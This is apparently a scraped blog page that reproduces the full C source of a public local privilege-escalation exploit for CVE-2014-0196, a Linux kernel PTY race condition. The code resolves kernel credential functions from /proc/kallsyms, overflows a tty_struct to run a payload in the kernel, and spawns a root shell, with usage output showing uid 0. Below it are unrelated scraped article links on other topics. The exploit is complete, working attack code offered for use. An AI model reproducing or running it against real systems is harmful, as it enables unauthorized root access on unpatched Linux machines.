/*

 * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race

 * condition

 *

 * Slightly-less-than-POC privilege escalation exploit

 * For kernels >= v3.14-rc1

 *

 * Matthew Daley <mattd@bugfuzz.com>

 *

 * Usage:

 *   $ gcc cve-2014-0196-md.c -lutil -lpthread

 *   $ ./a.out

 *   [+] Resolving symbols

 *   [+] Resolved commit_creds: 0xffffffff81056694

 *   [+] Resolved prepare_kernel_cred: 0xffffffff810568a7

 *   [+] Doing once-off allocations

 *   [+] Attempting to overflow into a tty_struct...............

 *   [+] Got it :)

 *   # id

 *   uid=0(root) gid=0(root) groups=0(root)

 *

 * WARNING: The overflow placement is still less-than-ideal; there is a 1/4

 * chance that the overflow will go off the end of a slab. This does not

 * necessarily lead to an immediate kernel crash, but you should be prepared

 * for the worst (i.e. kernel oopsing in a bad state). In theory this would be

 * avoidable by reading /proc/slabinfo on systems where it is still available

 * to unprivileged users.

 *

 * Caveat: The vulnerability should be exploitable all the way from

 * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in

 * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer

 * GFP_ATOMIC memory consumption") that make exploitation simpler, which this

 * exploit relies on.

 *

 * Thanks to Jon Oberheide for his help on exploitation technique.

 */

#include <sys/stat.h>

#include <sys/types.h>

#include <fcntl.h>

#include <pthread.h>

#include <pty.h>

#include <stdio.h>

#include <string.h>

#include <termios.h>

#include <unistd.h>

#define TTY_MAGIC 0x5401

#define ONEOFF_ALLOCS 200

#define RUN_ALLOCS    30

struct device;

struct tty_driver;

struct tty_operations;

typedef struct {

	int counter;

} atomic_t;

struct kref {

	atomic_t refcount;

};

struct tty_struct_header {

	int	magic;

	struct kref kref;

	struct device *dev;

	struct tty_driver *driver;

	const struct tty_operations *ops;

} overwrite;

typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);

int master_fd, slave_fd;

char buf[1024] = {0};

commit_creds_fn commit_creds;

prepare_kernel_cred_fn prepare_kernel_cred;

int payload(void) {

	commit_creds(prepare_kernel_cred(0));

	return 0;

}

unsigned long get_symbol(char *target_name) {

	FILE *f;

	unsigned long addr;

	char dummy;

	char name[256];

	int ret = 0;

	f = fopen("/proc/kallsyms", "r");

	if (f == NULL)

		return 0;

	while (ret != EOF) {

		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);

		if (ret == 0) {

			fscanf(f, "%s\n", name);

			continue;

		}

		if (!strcmp(name, target_name)) {

			printf("[+] Resolved %s: %p\n", target_name, (void *)addr);

			fclose(f);

			return addr;

		}

	}

	printf("[-] Couldn't resolve \"%s\"\n", name);

	fclose(f);

	return 0;

}

void *overwrite_thread_fn(void *p) {

	write(slave_fd, buf, 511);

	write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));

	write(slave_fd, &overwrite, sizeof(overwrite));

}

int main() {

	char scratch[1024] = {0};

	void *tty_operations[64];

	int i, temp_fd_1, temp_fd_2;

	for (i = 0; i < 64; ++i)

		tty_operations[i] = payload;

	overwrite.magic                 = TTY_MAGIC;

	overwrite.kref.refcount.counter = 0x1337;

	overwrite.dev                   = (struct device *)scratch;

	overwrite.driver                = (struct tty_driver *)scratch;

	overwrite.ops                   = (struct tty_operations *)tty_operations;

	puts("[+] Resolving symbols");

	commit_creds = (commit_creds_fn)get_symbol("commit_creds");

	prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");

	if (!commit_creds || !prepare_kernel_cred)

		return 1;

	puts("[+] Doing once-off allocations");

	for (i = 0; i < ONEOFF_ALLOCS; ++i)

		if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {

			puts("[-] pty creation failed");

			return 1;

		}

	printf("[+] Attempting to overflow into a tty_struct...");

	fflush(stdout);

	for (i = 0; ; ++i) {

		struct termios t;

		int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;

		pthread_t overwrite_thread;

		if (!(i & 0xfff)) {

			putchar('.');

			fflush(stdout);

		}

		if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {

			puts("\n[-] pty creation failed");

			return 1;

		}

		for (j = 0; j < RUN_ALLOCS; ++j)

			if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {

				puts("\n[-] pty creation failed");

				return 1;

			}

		close(fds[RUN_ALLOCS / 2]);

		close(fds2[RUN_ALLOCS / 2]);

		write(slave_fd, buf, 1);

		tcgetattr(master_fd, &t);

		t.c_oflag &= ~OPOST;

		t.c_lflag |= ECHO;

		tcsetattr(master_fd, TCSANOW, &t);

		if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {

			puts("\n[-] Overwrite thread creation failed");

			return 1;

		}

		write(master_fd, "A", 1);

		pthread_join(overwrite_thread, NULL);

		for (j = 0; j < RUN_ALLOCS; ++j) {

			if (j == RUN_ALLOCS / 2)

				continue;

			ioctl(fds[j], 0xdeadbeef);

			ioctl(fds2[j], 0xdeadbeef);

			close(fds[j]);

			close(fds2[j]);

		}

		ioctl(master_fd, 0xdeadbeef);

		ioctl(slave_fd, 0xdeadbeef);

		close(master_fd);

		close(slave_fd);

		if (!setresuid(0, 0, 0)) {

			setresgid(0, 0, 0);

			puts("\n[+] Got it :)");

			execl("/bin/bash", "/bin/bash", NULL);

		}

	}

}

CVE-2014-0196(马拉松赛跑bug)的更多相关文章

  1. SegmentFault 2014黑客马拉松 北京 作品demo

    1号作品展示——最熟悉的陌生人 app 利用录音(声纹识别)和照片来让好久不见的见面变得不那么尴尬. 2号作品展示——神奇魔镜 app 灵感来自通话<白雪公主>,穿越到今天的“魔镜”功能依 ...

  2. 洛谷P3113 [USACO14DEC]马拉松赛跑Marathon_Gold 线段树维护区间最大值 模板

    如此之裸- Code: #include<cstdio> #include<cstring> #include<cmath> #include<algorit ...

  3. 【独家】K8S漏洞报告 | 近期bug fix解读

    安全漏洞CVE-2019-3874分析 Kubernetes近期重要bug fix分析 Kubernetes v1.13.5 bug fix数据分析 ——本周更新内容 安全漏洞CVE-2019-387 ...

  4. Bash漏洞批量检测工具与修复方案

    &amp;amp;lt;img src="http://image.3001.net/images/20140928/14118931103311.jpg!small" t ...

  5. Daily record-August

    August11. A guide dog can guide a blind person. 导盲犬能给盲人引路.2. A guide dog is a dog especially trained ...

  6. 你真的会玩SQL吗?表表达式,排名函数

    你真的会玩SQL吗?系列目录 你真的会玩SQL吗?之逻辑查询处理阶段 你真的会玩SQL吗?和平大使 内连接.外连接 你真的会玩SQL吗?三范式.数据完整性 你真的会玩SQL吗?查询指定节点及其所有父节 ...

  7. [译]git log进阶

    格式化log输出 oneline --oneline标记将每个commit压缩成一行. 默认情况下显示一个commit ID和commit描述的第一行. 输出如下: 0e25143 Merge bra ...

  8. RFID应用范围

    RFID应用范围 (1)物流: 物流过程中的货物追踪,信息自动采集,仓储应用,港口应用,邮政,快递 (2)零售: 商品的销售数据实时统计,补货,防盗 (3)制造业: 生产数据的实时监控,质量追踪,自动 ...

  9. Android安全研究经验谈

    安全研究做什么 从攻击角度举例,可以是:对某个模块进行漏洞挖掘的方法,对某个漏洞进行利用的技术,通过逆向工程破解程序.解密数据,对系统或应用进行感染.劫持等破坏安全性的攻击技术等. 而防御上则是:查杀 ...

随机推荐

  1. $(document).ready(function(){}),$().ready(function(){})和$(function(){})三个有区别么

    三者都是一样的,最完整的写法是:$(document).ready(function(){})ready() 函数仅能用于当前文档,因此无需选择器.所以document选择器可以不要,那么就可以写成: ...

  2. 04_RHEL7.1忘记root密码

    在开机进入启动项时,选择需要重设密码的那个启动项 按e进入编辑模式,找到rhgb和quiet参数(几乎在最下面),替换为 init=/bin/sh 按ctrl+X不需密码进入shell 以rw的方式重 ...

  3. IOC-控制反转(Inversion of Control),也成依赖倒置(Dependency Inversion Principle)

    基本简介 IoC 亦称为 “依赖倒置原理”("Dependency Inversion Principle").差不多所有框架都使用了“倒置注入(Fowler 2004)技巧,这可 ...

  4. jquery 插件大全

    1.jquery.roundabout.js 超棒的左右3D旋转式幻灯片jQuery插件 2.jquery validate.js 验证表单 3.jquery ui插件 对话框 日期 4.lhgdia ...

  5. linux 配置 sphinx 全文搜索引擎

    因为公司网站需要,最近在弄sphinx搜索引擎,也是遇到各种问题,最终终于解决了. 服务器系统:centos7 (64位) 详情看安装官网的安装教程进行 coreseek 3.2.14 这里只提一些注 ...

  6. JS定义对象方法?

    第一种:构造函数形式  把参数作为构造函数的参数传递,这样对于对象的初始化更灵活一点 <script language="javascript"><!-- /** ...

  7. mysql主从复制 (超简单) 转载

    怎么安装mysql数据库,这里不说了,只说它的主从复制,步骤如下: 1.主从服务器分别作以下操作:   1.1.版本一致   1.2.初始化表,并在后台启动mysql   1.3.修改root的密码 ...

  8. tornado项目

    tornado项目之基于领域驱动模型架构设计的京东用户管理后台 本博文将一步步揭秘京东等大型网站的领域驱动模型,致力于让读者完全掌握这种网络架构中的“高富帅”. 一.预备知识: 1.接口: pytho ...

  9. python处理mysql慢查询日志

    # -*- coding:utf8 -*- ''' Created on 2017年1月9日 @author: qiancheng ''' import re import os from email ...

  10. 一个处理Date与String的工具类

    public class DateUtil { private DateUtil(){ } public static final String hhmmFormat="HH:mm" ...